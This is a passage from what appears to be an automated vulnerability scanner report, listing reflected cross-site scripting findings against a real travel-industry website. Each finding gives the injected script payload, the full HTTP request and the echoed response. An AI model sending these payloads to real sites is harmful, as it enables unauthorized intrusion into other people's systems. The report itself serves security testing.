Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621519; expires=Tue, 02-Oct-2012 00:58:39 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:39 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13379


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>d45b727a2a6">home55bd4%22%3E%3Cscript%3Ealert(1)%3C9041d<a>d45b727a2a6</a>
...[SNIP]...

4.370. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f18ac"><script>alert(1)</script>101846b9346 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac"><script>alert(1)</script>101846b9346/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621519; expires=Tue, 02-Oct-2012 00:58:39 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:39 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13563


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac"><script>alert(1)</script>101846b9346/images">
...[SNIP]...

4.371. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bee01<a>388ea328403 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/imagesbee01<a>388ea328403/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621527; expires=Tue, 02-Oct-2012 00:58:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:48 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13360


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>388ea328403">imagesbee01<a>388ea328403</a>
...[SNIP]...

4.372. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e99ac"><script>alert(1)</script>b1b021b465 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/imagese99ac"><script>alert(1)</script>b1b021b465/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:47 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621527; expires=Tue, 02-Oct-2012 00:58:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A21%3A%22%2Fsearch%2Fshow_results%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:47 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13524


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/imagese99ac"><script>alert(1)</script>b1b021b465/loadingAnimation.gif">
...[SNIP]...

4.373. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 51627<a>37eb8e17911 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif51627<a>37eb8e17911 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:59:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621545; expires=Tue, 02-Oct-2012 00:59:05 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:59:05 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13341


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>37eb8e17911">loadingAnimation.gif51627<a>37eb8e17911</a>
...[SNIP]...

4.374. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b0d9"><a>47d39309e95 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif4b0d9"><a>47d39309e95 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621536; expires=Tue, 02-Oct-2012 00:58:56 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A45%3A%22%2Fsearch%2Fshow_results19a8e293e8100512b1a679d8%2F%22%3Bi%3A2%3Bs%3A33%3A%22%2Fsearch%2F19a8e29318a5d7b3a4d6d3dc%2F%22%3Bi%3A3%3Bs%3A45%3A%22%2Fsearch19a8e293c64291fec39985ba%2Fshow_results%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:57 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13345


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif4b0d9"><a>47d39309e95">
...[SNIP]...

4.375. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7968"><a>98157194752 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif?a7968"><a>98157194752=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621502; expires=Tue, 02-Oct-2012 00:58:22 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:22 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13351


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif?a7968"><a>98157194752=1">
...[SNIP]...

4.376. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5dae6<a>66c7f0639ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif?5dae6<a>66c7f0639ec=1 HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/script%3E0ad586733cb?css=includes/local_exceptions.v.1235614021
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317618493; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.1.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:58:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621510; expires=Tue, 02-Oct-2012 00:58:30 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:58:30 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 13347


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a>66c7f0639ec=1">loadingAnimation.gif?5dae6<a>66c7f0639ec=1</a>
...[SNIP]...

4.377. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3942"><script>alert(1)</script>4c8141f84cf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3Cc3942"><script>alert(1)</script>4c8141f84cf/script%3E101846b9346/images/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=1002258416; TN_langauge=english; TN_region=america; TN_country=; exp_last_activity=1317621519; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; __utma=248705925.958069665.1317600417.1317600417.1317603490.2; __utmb=248705925.6.10.1317603490; __utmc=248705925; __utmz=248705925.1317603490.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:02:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1317621734; expires=Tue, 02-Oct-2012 01:02:14 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A1%3Bs%3A33%3A%22%2Fproducts_services%2Fproduct_index%2F%22%3Bi%3A2%3Bs%3A58%3A%22%2Fproducts_services%2Ftravel_agency%2F19a8e293e5add7d2a5f3772f%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A4%3Bs%3A67%3A%22%2Fproducts_services19a8e293e7cff54d6ba4e0db%2Ftravel_agency%2Fcontracts%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 03 Oct 2011 01:02:14 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14148


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...
<a href="/home/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3Cc3942"><script>alert(1)</script>4c8141f84cf/script%3E101846b9346">
...[SNIP]...

4.378. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabretravelnetwork.com
Path:   /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2a892<a>4c5fb7d26fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C2a892<a>4c5fb7d26fc/script%3E101846b9346/images/images/loadingAnimation.gif HTTP/1.1
Host: www.sabretravelnetwork.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/loadingAnimation.gif
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
